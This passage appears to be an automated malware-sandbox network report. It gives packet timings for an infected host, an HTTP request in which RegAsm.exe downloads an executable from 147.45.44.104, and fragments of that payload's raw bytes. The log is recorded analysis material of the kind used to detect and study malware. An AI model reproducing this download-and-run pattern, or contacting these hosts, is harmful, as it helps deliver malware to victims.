                                                                                                                                                      Oct 3, 2024 09:16:43.782881021 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782891989 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782902956 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782910109 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.782915115 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782937050 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.782964945 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.783684015 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783699989 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783720016 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783730984 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783740997 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783751965 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783751965 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.783763885 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783777952 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.783792973 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.783818960 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.784509897 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784523964 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784533978 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784544945 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784555912 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784559965 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.784569979 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784581900 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784584999 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.784594059 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784605026 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784607887 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.784625053 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.784642935 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.785465002 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785479069 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785490990 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785502911 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785514116 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785523891 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785526991 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.785535097 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785547018 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785553932 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.785557985 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785573006 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.785590887 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.786456108 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786469936 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786484003 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786495924 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786505938 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786510944 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.786518097 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786530018 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786540985 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786541939 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.786551952 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786557913 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.786587000 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.787354946 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.787369013 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.787379980 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.787403107 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.787434101 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.787434101 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.787458897 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.866652966 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.866694927 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.866704941 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.866797924 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.866945982 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.866957903 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.866969109 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.866981030 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867007017 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.867022038 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.867544889 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867556095 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867568016 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867578983 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867604971 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.867620945 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.867706060 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867717981 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867729902 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867738962 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867759943 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.867784977 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.868098974 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868110895 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868123055 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868134975 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868165970 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.868192911 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.868612051 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868623018 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868638039 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868648052 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868659019 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868669033 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868679047 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868686914 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.868747950 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.868747950 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.869498014 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.869509935 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.869520903 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.869532108 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.869544029 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.869565010 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.869592905 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.870026112 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870037079 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870048046 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870058060 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870068073 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870078087 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870085955 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.870089054 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870104074 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.870126009 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.870901108 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870912075 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.376415968 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:46.376635075 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:46.376651049 CEST44349748188.114.96.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.376663923 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:46.376669884 CEST44349748188.114.96.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.393914938 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.393964052 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.394041061 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.394406080 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.394418955 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.483814955 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.483947992 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:46.484462976 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:46.484478951 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.486326933 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:46.486336946 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.889791012 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.889929056 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.891808033 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.891819000 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.892050982 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.893311977 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.893328905 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.893362999 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.231856108 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.231935024 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:47.231950045 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.232011080 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:47.232172966 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:47.232196093 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.289664030 CEST4975180192.168.2.645.132.206.251
                                                                                                                                                      Oct 3, 2024 09:16:47.298247099 CEST804975145.132.206.251192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.298365116 CEST4975180192.168.2.645.132.206.251
                                                                                                                                                      Oct 3, 2024 09:16:47.298543930 CEST4975180192.168.2.645.132.206.251
                                                                                                                                                      Oct 3, 2024 09:16:47.298594952 CEST4975180192.168.2.645.132.206.251
                                                                                                                                                      Oct 3, 2024 09:16:47.304713964 CEST804975145.132.206.251192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.304833889 CEST804975145.132.206.251192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.304841995 CEST804975145.132.206.251192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.304856062 CEST804975145.132.206.251192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.369812965 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.369913101 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.369995117 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:47.370299101 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:47.370317936 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.370328903 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:47.370335102 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.393949032 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.393985033 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.394078970 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.394500017 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.394510984 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.877446890 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.877599955 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.879578114 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.879591942 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.879853964 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.881274939 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.881314039 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.881350994 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:48.158515930 CEST804975145.132.206.251192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:48.158642054 CEST4975180192.168.2.645.132.206.251
                                                                                                                                                      Oct 3, 2024 09:16:49.332487106 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.332582951 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.332689047 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:49.333045959 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:49.333071947 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.333086967 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:49.333093882 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.352547884 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.352590084 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.352807999 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.353275061 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.353286028 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.860117912 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.860301018 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.862111092 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.862122059 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.862415075 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.863737106 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.863737106 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.863827944 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.284297943 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.284395933 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.286185980 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:50.295810938 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:50.295810938 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:50.295839071 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.295850992 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.311708927 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.311753035 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.311856031 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.312273026 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.312285900 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.829246998 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.829425097 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.831257105 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.831281900 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.831595898 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.832876921 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.832914114 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.832963943 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.296338081 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.296566963 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.296627045 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:51.312666893 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:51.312696934 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.312714100 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:51.312721014 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.357254982 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.357279062 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.357351065 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.357914925 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.357928038 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.878905058 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.879055977 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.881269932 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.881283045 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.881527901 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.882891893 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.882914066 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.883094072 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:52.103247881 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:52.103337049 CEST4975180192.168.2.645.132.206.251
                                                                                                                                                      Oct 3, 2024 09:16:52.326694012 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:52.326798916 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:52.326920986 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:52.327028036 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:52.327054024 CEST44349755104.21.17.174192.168.2.6
Session ID: 0
Source IP: 192.168.2.6
Source Port: 49745
Destination IP: 147.45.44.104
Destination Port: 80
PID: 6880
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data

Oct 3, 2024 09:16:42.795058012 CEST | 189 | OUT
GET /ldms/66fe13d251bbf_lsod.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 147.45.44.104
Cache-Control: no-cache

Oct 3, 2024 09:16:43.416296959 CEST | 1236 | IN
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 07:16:43 GMT
Content-Type: application/octet-stream
Content-Length: 391072
Last-Modified: Thu, 03 Oct 2024 03:47:30 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66fe13d2-5f7a0"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
                                                                                                                                                      Oct 3, 2024 09:16:43.416608095 CEST896INData Raw: 66 95 1c 87 7a d2 17 3d a7 c1 08 f4 4e 7a f9 eb 20 47 a5 a4 46 2c 12 09 5c 74 68 9a 45 e9 83 92 7b 42 8e df d4 9c 9b 3a b6 8a 4a d7 15 a7 e5 b1 43 b0 0e 46 8e 8c 9e a7 27 17 67 a6 a2 29 59 ac 83 04 c9 bc 5e 5e 81 4f f8 55 ba 18 6e 79 9a e9 53 06
                                                                                                                                                      Data Ascii: fz=Nz GF,\thE{B:JCF'g)Y^^OUnyS0't^y<? TP@vp/nG$\M0XKL X&WM"DaLo6xZEwS(>J(v0p)oar[ `
                                                                                                                                                      Oct 3, 2024 09:16:43.416619062 CEST1236INData Raw: 7c 19 39 77 9f b6 02 65 75 aa c1 73 94 6c 21 4d 53 a7 c8 b7 08 a3 c3 85 5d ae 1c e6 ed 03 fd 06 ee ee e1 64 9f 3b 27 6c 93 f8 fc 00 12 59 a0 c1 a8 37 15 e1 9b c5 11 82 ab ca 5f 35 3f 68 59 88 12 4d 49 0c d8 5d f8 f6 81 9c 9b 8f e7 15 70 bc ea 9b
                                                                                                                                                      Data Ascii: |9weusl!MS]d;'lY7_5?hYMI]p &l?Q0g>JVHBC>TK.c,NEn<0n4`:!IE2 %vhv~pp\F}kX4\<lajWtH
                                                                                                                                                      Oct 3, 2024 09:16:43.417084932 CEST1236INData Raw: 79 9a 8d ab 4e 82 63 a0 85 d5 9c eb 55 fb 68 c8 ef d7 ae 40 7b d9 51 fa cf 70 88 80 8e 48 12 43 b8 3a ff b5 7e da b2 aa ed 13 ca ef d6 08 90 ae cb f1 03 d4 5e 26 03 b9 b5 23 6c b2 22 74 3d 4f 48 51 32 f6 25 c5 e5 1b 04 29 a1 13 01 68 1e ff fd 7c
                                                                                                                                                      Data Ascii: yNcUh@{QpHC:~^&#l"t=OHQ2%)h|NpB|8Z0qn5W$iQE\(Uh\6f6uR7,.:t<8vo3'pOhD7b@Cp(;#[d#I:m5G:aT.~,A~j
                                                                                                                                                      Oct 3, 2024 09:16:43.417097092 CEST1236INData Raw: de 8f d1 6c 52 70 c8 bd 0c f6 55 4e ed 64 c0 96 5c 13 14 22 90 ba c1 1f 25 6e 66 1f 79 32 49 a1 2f 6b e6 39 59 a1 18 03 5f 3a ca 46 1b 55 70 da cf af dc 8a 9d e2 9b 1f 2d 92 c0 fd f3 bc 9b d3 59 bd 23 64 cb ca 9a ef 34 3f 62 b9 a7 01 d2 16 31 eb
                                                                                                                                                      Data Ascii: lRpUNd\"%nfy2I/k9Y_:FUp-Y#d4?b1]"1x0^D*5fo(M7vKu]YqpPq:\a:k>({](aEJY\_Gp|Z:LZ]w{:uR!r7g+sSIJKk
                                                                                                                                                      Oct 3, 2024 09:16:43.417108059 CEST1236INData Raw: 0a 3f 4d c4 af 42 e1 31 ce bb 05 62 06 5d da 1e 52 3c 5a 98 47 9c cd 79 ec cb 1f 52 f7 f9 e8 f5 54 38 75 05 e7 66 74 9f 1f 4c 97 a9 7f cf 70 20 87 e7 81 05 26 53 bb 47 4c 48 43 9d 3a 1e d9 1f 1a 1c b8 0b 5d 65 e3 1b 40 dc 08 b5 10 0a 56 e2 83 c5
                                                                                                                                                      Data Ascii: ?MB1b]R<ZGyRT8uftLp &SGLHC:]e@Vw]X2wHIKyO-i`T/l4.:\`EspjBS"QGG.<ptV7i{/WYnJlvXb/&hQCoP595}%VM
